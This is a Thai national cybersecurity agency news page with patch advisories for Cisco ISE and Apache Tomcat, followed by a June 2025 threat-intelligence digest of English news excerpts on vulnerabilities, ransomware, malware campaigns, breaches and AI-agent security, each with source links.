จำกัดการเข้าถึงอินสแตนซ์ Cisco ISE ด้วยการกำหนดกลุ่มความปลอดภัย (security groups) บนแพลตฟอร์มคลาวด์ ให้อนุญาตเฉพาะ IP ต้นทางของผู้ดูแลระบบที่ได้รับอนุญาตเท่านั้น อนุญาตเฉพาะ IP ต้นทางของผู้ดูแลระบบที่ระบุไว้ล่วงหน้าสำหรับการเข้าถึง Cisco ISE การดำเนินมาตรการนี้จะช่วยป้องกันการเชื่อมต่อจากแหล่งที่อาจเป็นอันตรายได้อย่างมีประสิทธิภาพ.
อ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-057/สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ช่องโหว่ความรุนแรงสูงใน Apache Tomcat CGI Servletโพสต์ใน Cyber Security News
เมื่อวันที่ 6 มิถุนายน 2568 Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับมูลนิธิซอฟต์แวร์ Apache ได้ออกอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ความรุนแรงสูง (CVE-2025-46701) ใน Servlet ของ Common Gateway Interface (CGI) ของ Apache Tomcat ซึ่งมูลนิธิซอฟต์แวร์ Apache ได้ออกอัปเดตความปลอดภัยเพื่อจัดการกับช่องโหว่ความรุนแรงสูง (CVE-2025-46701) ที่มีอยู่ใน CGI Servlet ของ Apache Tomcat
ผลกระทบ
หากถูกโจมตีโดยสำเร็จ ผู้ไม่หวังดีอาจสามารถหลีกเลี่ยงข้อจำกัดด้านความปลอดภัยที่มีการตั้งค่าไว้ และเข้าถึงทรัพยากร CGI ที่ถูกจำกัดได้โดยไม่ได้รับอนุญาต โดยการใช้ URL ที่มีการดัดแปลงอย่างเจาะจงช่องโหว่นี้มีผลกระทบกับผลิตภัณฑ์ต่อไปนี้
- Apache Tomcat 11.0.0-M1 ถึง 11.0.6
- Apache Tomcat 10.1.0-M1 ถึง 10.1.40
- Apache Tomcat 9.0.0.M1 ถึง 9.0.104
แนวทางการแก้ไข
แนะนำให้ผู้ใช้งานและผู้ดูแลระบบที่ใช้ผลิตภัณฑ์ดังกล่าว อัปเดตเป็นเวอร์ชันล่าสุดทันที เพื่อความปลอดภัยของระบบ.อ้างอิง
https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-056/สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
พบช่องโหว่ร้ายแรงใน Roundcube Webmail ที่ซ่อนอยู่นานกว่า 10 ปี เสี่ยงถูกยึดระบบโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
ยูเครนรวบแฮกเกอร์ ขโมยบัญชีโฮสติ้งกว่า 5,000 บัญชีใช้ขุดคริปโตโพสต์ใน Cyber Security News
สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand
-
Cyber Threat Intelligence 05 June 2025โพสต์ใน Cyber Security News
Energy Sector
- The Future Of Cybersecurity Standards For Global Federal Energy Systems
"According to a report, 71% of energy industry professionals consider their organizations more vulnerable to OT cyber events than ever. These are private organizations, but the stakes are much higher for government-owned systems. Government-owned energy systems such as national grids, nuclear facilities, pipelines, and strategic reserves are foundational to national sovereignty and public welfare."
https://www.tripwire.com/state-of-security/future-cybersecurity-standards-global-federal-energy-systems
Industrial Sector
- Ramnit Malware Infections Spike In OT As Evidence Suggests ICS Shift
"Industrial giant Honeywell on Wednesday published its 2025 Cybersecurity Threat Report, which shows that ransomware and other malware attacks have surged in the industrial sector. Honeywell’s report shows — based on OSINT and industry sources — that there has been a significant increase in ransomware attacks on industrial organizations. While these attacks did not necessarily impact operational technology (OT) systems, more than half of the 55 cybersecurity incidents reported to the SEC in 2024 did affect OT."
https://www.securityweek.com/ramnit-malware-infections-spike-in-ot-as-evidence-suggests-ics-shift/
https://www.honeywell.com/content/dam/honeywellbt/en/documents/gated/hon-corp-honeywell-2025-cyber-threat-report.pdf
Vulnerabilities
- Cisco Warns Of ISE And CCP Flaws With Public Exploit Code
"Cisco has released patches to address three vulnerabilities with public exploit code in its Identity Services Engine (ISE) and Customer Collaboration Platform (CCP) solutions. The most severe of the three is a critical static credential vulnerability tracked as CVE-2025-20286, found by GMO Cybersecurity's Kentaro Kawane in Cisco ISE. This identity-based policy enforcement software provides endpoint access control and network device administration in enterprise environments. The vulnerability is due to improperly generated credentials when deploying Cisco ISE on cloud platforms, resulting in shared credentials across different deployments."
https://www.bleepingcomputer.com/news/security/cisco-warns-of-ise-and-ccp-flaws-with-public-exploit-code/
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-aws-static-cred-FPMjUcm7 - CISA Adds Three Known Exploited Vulnerabilities To Catalog
"CISA has added three new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
CVE-2025-21479 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability
CVE-2025-21480 Qualcomm Multiple Chipsets Incorrect Authorization Vulnerability
CVE-2025-27038 Qualcomm Multiple Chipsets Use-After-Free Vulnerability"
https://www.cisa.gov/news-events/alerts/2025/06/03/cisa-adds-three-known-exploited-vulnerabilities-catalog
https://securityaffairs.com/178610/hacking/u-s-cisa-adds-multiple-qualcomm-chipsets-flaws-to-its-known-exploited-vulnerabilities-catalog.html
Malware
- Updated Guidance On Play Ransomware
"CISA, the Federal Bureau of Investigation (FBI), and the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) have issued an updated advisory on Play ransomware, also known as Playcrypt. This advisory highlights new tactics, techniques, and procedures used by the Play ransomware group and provides updated indicators of compromise (IOCs) to enhance threat detection."
https://www.cisa.gov/news-events/alerts/2025/06/04/updated-guidance-play-ransomware
https://www.bleepingcomputer.com/news/security/fbi-play-ransomware-breached-900-victims-including-critical-orgs/
https://www.theregister.com/2025/06/04/play_ransomware_infects_900_victims/ - ViperSoftX Stealing Cryptocurrencies
"AhnLab SEcurity intelligence Center (ASEC) has confirmed that the ViperSoftX attacker is continuously distributing malware to users in Korea. ViperSoftX is a type of malware that resides in infected systems and is responsible for executing threat actors’ commands and stealing cryptocurrencies. ASEC previously published an analysis of a ViperSoftX attack case in May 2024, which covered a distribution case of TesseractStealer, a malware that utilizes Quasar RAT, a remote access Trojan, and Tesseract, an open-source OCR engine that uses deep learning."
https://asec.ahnlab.com/en/88336/ - FBI Warns Of NFT Airdrop Scams Targeting Hedera Hashgraph Wallets
"The FBI is warning about a new scam where cybercriminals exploit NFT airdrops on the Hedera Hashgraph network to steal crypto from cryptocurrency wallets. Airdrops are a method of distributing cryptocurrency tokens for free to wallet addresses, usually as part of a marketing, community growth, or reward campaign, but they are also used as bait for scams. "The Hedera Hashgraph is the distributed ledger used by Hedera. The airdrop feature was originally created by the Hedera Hashgraph network for marketing purposes; however, cyber criminals can exploit this tactic to collect victim data to steal cryptocurrency," explains the FBI advisory."
https://www.bleepingcomputer.com/news/security/fbi-warns-of-nft-airdrop-scams-targeting-hedera-hashgraph-wallets/
https://www.ic3.gov/PSA/2025/PSA250603 - The Cost Of a Call: From Voice Phishing To Data Extortion
"Google Threat Intelligence Group (GTIG) is tracking UNC6040, a financially motivated threat cluster that specializes in voice phishing (vishing) campaigns specifically designed to compromise organizations' Salesforce instances for large-scale data theft and subsequent extortion. Over the past several months, UNC6040 has demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements."
https://cloud.google.com/blog/topics/threat-intelligence/voice-phishing-data-extortion
https://www.bleepingcomputer.com/news/security/google-hackers-target-salesforce-accounts-in-data-extortion-attacks/
https://www.darkreading.com/application-security/vishing-crew-salesforce-data
https://thehackernews.com/2025/06/google-exposes-vishing-group-unc6040.html
https://therecord.media/google-warns-cybercriminals-targeting-salesforce-apps
https://www.securityweek.com/google-warns-of-vishing-extortion-campaign-targeting-salesforce-customers/
https://cyberscoop.com/google-unc6040-salesforce-attacks/
https://www.helpnetsecurity.com/2025/06/04/salesforce-vishing-attacks/
https://www.theregister.com/2025/06/04/fake_it_support_calls_hit/ - ClickFix Campaign Spoofs Booking.com For Malware Delivery
"Over the past few months, Cofense Intelligence has been tracking a series of travel assistance-themed, Booking.com-spoofing emails targeting hotel chains within the accommodation and food services sector. These campaigns are notable for delivering a wide variety of remote access trojans (RATs) or information stealers via an embedded link to a fake CAPTCHA site that delivers a malicious script instead of a verification code. The website will prompt the user to run the malicious script using Windows keyboard shortcuts."
https://cofense.com/blog/clickfix-campaign-spoofs-booking-com-for-malware-delivery
https://www.infosecurity-magazine.com/news/phishing-fake-bookingcom-emails/ - The Bitter End: Unraveling Eight Years Of Espionage Antics—Part One
"TA397 (Bitter) is an espionage group with a long history of targeting South Asian entities. While the group is frequently attributed to India (non-publicly), the reasoning behind this is not clearly documented. In this blog we share evidence showing TA397 to be an India-aligned threat actor and release previously undisclosed evidence of the group’s targeting outside of Asia. In part one of this blog series, we explore TA397’s campaigns, targeting, and payload delivery and conduct an in-depth analysis of TA397’s infrastructure. Part two of this blog series expands on this research with a deep dive into TA397’s entire observed malware arsenal, highlighting how the group’s capabilities support its espionage operations."
https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one
https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two - From Open-Source To Open Threat: Tracking Chaos RAT’s Evolution
"Chaos RAT is an open-source RAT written in Golang, offering cross-platform support for both Windows and Linux systems. Inspired by popular frameworks such as Cobalt Strike and Sliver, Chaos RAT provides an administrative panel where users can build payloads, establish sessions and control compromised machines. While Golang-based malware tends to be slower and of larger size when compared to those written in C++ or other common languages, it benefits from Golang's cross-compilation capabilities, resulting in reduced development time and greater flexibility."
https://www.acronis.com/en-us/cyber-protection-center/posts/from-open-source-to-open-threat-tracking-chaos-rats-evolution/
https://thehackernews.com/2025/06/chaos-rat-malware-targets-windows-and.html - The Strange Tale Of Ischhfd83: When Cybercriminals Eat Their Own
"At Sophos X-Ops, we often get queries from our customers asking if they’re protected against certain malware variants. At first glance, a recent question seemed no different. A customer wanted to know if we had protections for ‘Sakura RAT,’ an open-source malware project hosted on GitHub, because of media claims that it had “sophisticated anti-detection capabilities.” When we looked into Sakura RAT, we quickly realized two things. First, the RAT itself was likely of little threat to our customer. Second, while the repository did indeed contain malicious code, that code was intended to target people who compiled the RAT, with infostealers and other RATs. In other words, Sakura RAT was backdoored."
https://news.sophos.com/en-us/2025/06/04/the-strange-tale-of-ischhfd83-when-cybercriminals-eat-their-own/
https://www.bleepingcomputer.com/news/security/hacker-targets-other-hackers-and-gamers-with-backdoored-github-code/
https://www.infosecurity-magazine.com/news/campaign-targets-cybercriminals/ - Malware Masquerades As Legitimate, Hidden WordPress Plugin With Remote Code Execution Capabilities
"The Wordfence Threat Intelligence team recently discovered an interesting malware variant that appears in the file system as a normal WordPress plugin containing a comment header, a handful of functions as well as a simple admin interface. Just like previous examples we have seen, this piece of malware contains code that ensures it remains hidden in the administrator dashboard. It has a password extraction feature, which requires configuration through its own admin interface, an AJAX-based remote code execution mechanism and unfinished code suggesting it is still in development."
https://www.wordfence.com/blog/2025/06/malware-masquerades-as-legitimate-hidden-wordpress-plugin-with-remote-code-execution-capabilities/
Breaches/Hacks/Leaks
- ‘Deliberate Attack’ Deletes Shopping App’s AWS And GitHub Resources
"The CEO of Indian grocery ordering app KiranaPro has claimed an attacker deleted its GitHub and AWS resources in a targeted and deliberate attack and vowed to name the perpetrator. KiranaPro lets users shop at “Kiranas,” the Indian equivalent of convenience stores, which mostly stock basic foodstuffs. Users of the app place an order, which KiranaPro sends to nearby Kiranas who bid to win the sale. The winner arranges delivery of the goods. The elapsed time from ordering to delivery seldom tops 20 minutes."
https://www.theregister.com/2025/06/04/kiranapro_cyberattack_deletes_cloud_resources/ - Media Giant Lee Enterprises Says Data Breach Affects 39,000 People
"Publishing giant Lee Enterprises is notifying nearly 40,000 people whose personal information was stolen in a February 2025 ransomware attack. As one of the largest newspaper groups in the United States, Lee Enterprises publishes 77 daily newspapers and 350 weekly and specialty publications across 26 states. The local news provider's newspapers have a daily circulation of over 1.2 million, and a digital audience reaching tens of millions each month. In a filing with the Office of Maine's Attorney General this week, the company revealed that attackers behind a ransomware attack in February stole documents containing personally identifiable information of 39,779 individuals."
https://www.bleepingcomputer.com/news/security/media-giant-lee-enterprises-says-data-breach-affects-39-000-people/
https://therecord.media/newspaper-lee-enterprises-cyberattack-ssn
https://www.theregister.com/2025/06/04/cyberattack_lee_enterprises/ - Ukraine Claims It Hacked Tupolev, Russia’s Strategic Warplane Maker
"The Main Intelligence Directorate (GUR) of Ukraine's Ministry of Defense claims it hacked the Russian aerospace and defense company Tupolev, which develops Russia's supersonic strategic bombers. According to Ukrainian news outlets, a source within GUR said the military intelligence hackers breached Tupolev's systems and stole 4.4 gigabytes of classified information. This stolen data includes personal data of Tupolev personnel, internal communications (including messages exchanged by the company's management), procurement documents, resumes of engineers and designers, and minutes of closed meetings."
https://www.bleepingcomputer.com/news/security/ukraine-claims-it-hacked-tupolev-russias-strategic-warplane-maker/
https://therecord.media/ukraine-military-russia-strategic-bomber
https://securityaffairs.com/178641/hacking/ukraines-military-intelligence-agency-stole-4-4gb-of-highly-classified-internal-data-from-tupolev.html
https://www.theregister.com/2025/06/04/ukraine_hack_attack_russia/ - Exclusive: Hackers Leak 86 Million AT&T Records With Decrypted SSNs
"Hackers have leaked what they claim is AT&T’s database which was reportedly stolen by the ShinyHunters group in April 2024 after they exploited major security flaws in the Snowflake cloud data platform. But is this really the Snowflake-linked data? We took a closer look. As seen by the Hackread.com research team, the data was first posted on a well-known Russian cybercrime forum on May 15, 2025. It was re-uploaded on the same forum on June 3, 2025, after which it began circulating among other hackers and forums."
https://hackread.com/hackers-leak-86m-att-records-with-decrypted-ssns/ - Ransomware Scum Leak Patient Data After Disrupting Chemo Treatments At Kettering
"Kettering Health patients who had chemotherapy sessions and pre-surgery appointments canceled due to a ransomware attack in May now have to deal with the painful prospect that their personal info may have been leaked online. Earlier today, ransomware gang Interlock dumped 941 GB of data purportedly belonging to the healthcare provider. The stolen information appears to include ID cards, payment data, purchasing and financial reports, among a ton of other patient and staff details, and encompasses 732,490 files across 20,418 folders, according to the leak site."
https://www.theregister.com/2025/06/04/ransomware_scum_leak_kettering_patient_data/
General News
- The Hidden Risks Of LLM Autonomy
"Large language models (LLMs) have come a long way from the once passive and simple chatbots that could respond to basic user prompts or look up the internet to generate content. Today, they can access databases and business applications, interact with external systems to independently execute complex tasks and make business decisions. This transformation is primarily supported by emerging interoperability standards, such as the Model Context Protocol (MCP) and Agent-to-Agent (A2A) communication."
https://www.helpnetsecurity.com/2025/06/04/llm-agency/ - Agentic AI And The Risks Of Unpredictable Autonomy
"In this Help Net Security interview, Thomas Squeo, CTO for the Americas at Thoughtworks, discusses why traditional security architectures often fail when applied to autonomous AI systems. He explains why conventional threat modeling needs to adapt to address autonomous decision-making and emergent behaviors. Squeo also outlines strategies for maintaining control and accountability when AI agents operate with increasing autonomy."
https://www.helpnetsecurity.com/2025/06/04/thomas-squeo-thoughtworks-ai-systems-threat-modeling/ - Rethinking Governance In a Decentralized Identity World
"Decentralized identity (DID) is gaining traction, and for CISOs, it’s becoming a part of long-term planning around data protection, privacy, and control. As more organizations experiment with verifiable credentials and self-sovereign identity models, a question emerges: Who governs the system when no single entity holds the reins?"
https://www.helpnetsecurity.com/2025/06/04/governance-decentralized-identity/ - Exposure Management:From Subjective ToObjective Cybersecurity
"Exposure management gives business and cybersecurity leaders the methodology and tools to make informed cybersecurity risk management decisions. Significant barriers stand in the way of adoption."
https://www.ivanti.com/resources/research-reports/proactive-security
https://www.helpnetsecurity.com/2025/06/04/ciso-exposure-management/ - #Infosec2025: Majority Of Compromises Caused By Stolen Credentials, No MFA
"More than half (56%) of all compromises in Q1 2025 resulted from the theft of valid account credentials with no multi-factor authentication (MFA) in place, according to new research by Rapid7, published during Infosecurity Europe 2025. The researchers expect stolen credentials to continue to be the dominant initial access technique while organizations fail to protect all accounts with MFA. In the previous two quarters, a similar proportion of initial access vectors were related to credential theft and a lack of MFA."
https://www.infosecurity-magazine.com/news/majority-compromises-stolen/ - The Security Risks Of Internet-Exposed Solar Power Systems
"On May 14, Reuters reported rogue communication devices were found in Chinese-manufactured solar power inverters. That news prompted governments throughout the world to evaluate the potential impact of these inverters being remotely disabled. Also, last month, the Iberian peninsula experienced a massive power grid failure where societies in Madrid, Lisbon and all over the region were deeply affected by a blackout. Life came to a sudden halt. Airports shutdown. Trains stopped in the middle of nowhere. Traffic lights were out. Digital payment systems to buy food and water were useless. It was a chaotic and stressful time."
https://www.forescout.com/blog/the-security-risks-of-internet-exposed-solar-power-systems/
https://www.securityweek.com/35000-solar-power-systems-exposed-to-internet/
https://www.darkreading.com/vulnerabilities-threats/35k-solar-devices-internet-exposure-hijacking - Hacker Arrested For Breaching 5,000 Hosting Accounts To Mine Crypto
"The Ukrainian police arrested a 35-year-old hacker who breached 5,000 accounts at an international hosting company and used them to mine cryptocurrency, resulting in $4.5 million in damages. "The suspect illegally gained access to over 5,000 accounts belonging to clients of an international hosting company that provides server rental services for the operation of various websites and online platforms," reads the police's announcement. "After gaining access to these accounts, the perpetrator began unauthorized deployment of virtual machines (software that emulates a computer's operation) using the company's server resources.""
https://www.bleepingcomputer.com/news/security/hacker-arrested-for-breaching-5-000-hosting-accounts-to-mine-crypto/ - U.S. Government Seizes Approximately 145 Criminal Marketplace Domains
"The U.S. Attorney’s Office for the Eastern District of Virginia announced today the seizure of approximately 145 darknet and traditional internet domains, and cryptocurrency funds associated with the BidenCash marketplace. The operators of the BidenCash marketplace use the platform to simplify the process of buying and selling stolen credit cards and associated personal information. BidenCash commenced operations in March 2022. BidenCash administrators charged a fee for every transaction conducted on the website. The BidenCash marketplace had grown to support over 117,000 customers, facilitated the trafficking of over 15 million payment card numbers and personally identifiable information, and generated over $17 million in revenue during its operations."
https://www.justice.gov/usao-edva/pr/us-government-seizes-approximately-145-criminal-marketplace-domains
https://www.bleepingcomputer.com/news/security/bidencash-carding-market-domains-seized-in-international-operation/
https://therecord.media/bidencash-cybercrime-darknet-market-takedown-us-netherlands
https://www.bankinfosecurity.com/police-seize-carder-site-bidencash-a-28586
https://cyberscoop.com/bidencash-marketplace-domains-seized/
https://hackread.com/feds-seize-bidencash-carding-market-crypto-profits/ - How Neuroscience Can Help Us Battle 'Alert Fatigue'
"I often say that cybersecurity professionals today are not drowning, they're suffocating. Research I recently undertook with colleagues at OX Security revealed that an average organization has more than half a million alerts at any given moment. More staggering is the fact that somewhere between 95% and 98% of those alerts are not critical, and many times not even issues that need to be dealt with at all. This deluge has created the alert fatigue crisis, which threatens the foundations of our digital defense and is actually deeply rooted in neuroscience."
https://www.darkreading.com/vulnerabilities-threats/how-neuroscience-battle-alert-fatigue - Researchers Bypass Deepfake Detection With Replay Attacks
"As synthetic audio continues to improve, it's also getting harder for anti-spoofing models to accurately detect. That's according to recent research published on June 1 by a team of researchers at German, Polish, and Romanian universities as well as Resemble AI, a vendor that provides AI voice generation tools as well as deepfake detectors. The research team presented how "replay attacks" are able to bypass audio deepfake detections. "By playing and re-recording deepfake audio through various speakers and microphones, we make spoofed samples appear authentic to the detection model," they wrote."
https://www.darkreading.com/cybersecurity-analytics/researchers-bypass-deepfake-detection-replay-attacks
https://arxiv.org/pdf/2505.14862 - Beware Of Device Code Phishing
"Device codes are alphanumeric or numeric codes employed for authenticating an account on a device that does not have a standard login interface, such as a browser or input-limited devices, where it is not practical to require the user to enter text to authenticate. Such use cases include Internet of Things (IoT) devices, streaming apps like Netflix and Apple TV, and cloud applications. Device code authentication specifically binds authentication to a particular device."
https://www.darkreading.com/vulnerabilities-threats/beware-device-code-phishing - How To Approach Security In The Era Of AI Agents
"Artificial intelligence (AI) agents represent an exciting technological evolution, capable of autonomously completing tasks, analyzing outcomes, and adapting their actions based on human-set goals. This next phase of hyperautomation has the potential to unlock unprecedented levels of efficiency and productivity for workers and enterprises — providing that the security team is engaged early and the proper controls are put in place from the start."
https://www.darkreading.com/cyber-risk/how-to-approach-security-era-ai-agents - The State Of DDoS Attacks In APAC In Q1 2025
"Our analysts continue to monitor the DDoS situation across Asia and share key trends in our regular reports. This is our Q1 2025 overview, where we highlight the most targeted industries, emerging techniques used by cybercriminals, and top insights based on data from our global scrubbing centers."
https://stormwall.network/resources/blog/ddos-report-apac-q1-2025
https://hackread.com/stormwall-india-china-us-most-ddos-attacks-q1-2025/ - #Infosec2025: Cybersecurity Support Networks Too Fragmented For SMBs, Say Experts
"Sources of cybersecurity advice and support are too diffuse and difficult to find, adding complexity to SMB efforts to build cyber-resilience, a panel of experts has argued. Speaking on the second day of Infosecurity Europe, experts from across industry, academia and government agreed that awareness isn’t necessarily the problem among smaller businesses. In fact, cybersecurity is now the second biggest concern for British SMBs, just after inflation, according to the recently released VikingCloud 2025 SMB Threat Landscape Report."
https://www.infosecurity-magazine.com/news/infosec2025-cybersecurity-support/ - #Infosec2025: Device Theft Causes More Data Loss Than Ransomware
"Phishing-related data breaches are the leading causes of data loss, followed by misconfigurations and stolen devices, according to a new survey from data erasure solution provider Blancco. The firm commissioned research agency Coleman Parkes to survey 2000 cybersecurity, IT and sustainability leaders from large enterprises across several countries and industries about their data security and data resilience practices. The results, published on June 4 in Blancco’s 2025 State of Data Sanitization Report, showed that 86% of organizations have experienced a data breach over the past three years."
https://www.infosecurity-magazine.com/news/device-theft-data-loss-ransomware/ - Going Into The Deep End: Social Engineering And The AI Flood
"It should come as no surprise that the vast majority of data breaches involve the “human element.” The 2025 Verizon Data Breach Investigations Report cites that human compromise held relatively steady year over year at nearly 70% of breaches. Human emotions and tendencies – and the massive variation in what influences each individual – are a massively dynamic vulnerability. Most equate Social Engineering with vague promises of riches to be had, or urgent or even threatening missives that require immediate action to avoid consequences. On the plus side, increased awareness has brought about a healthy skepticism in individuals and organizations toward something unexpected from a not completely familiar source."
https://www.securityweek.com/going-into-the-deep-end-social-engineering-and-the-ai-flood/ - More Than 1,800 People Arrested In Transnational Anti-Scam Operation Involving SPF; 106 Nabbed In Singapore
"Over 1,800 people were arrested during a month-long anti-scam operation by law enforcement authorities from seven Asian jurisdictions. Victims of the scam cases reportedly lost over S$289 million (US$225 million), the Singapore Police Force (SPF) said in a news release on Wednesday (Jun 4). Law enforcement agencies from Singapore, Hong Kong, South Korea, Malaysia, Maldives, Thailand and Macau conducted the operation between Apr 28 and May 28."
https://www.channelnewsasia.com/singapore/scams-1800-arrested-investigated-police-rental-impersonation-bank-transfer-5165696
อ้างอิง
Electronic Transactions Development Agency(ETDA)
- The Future Of Cybersecurity Standards For Global Federal Energy Systems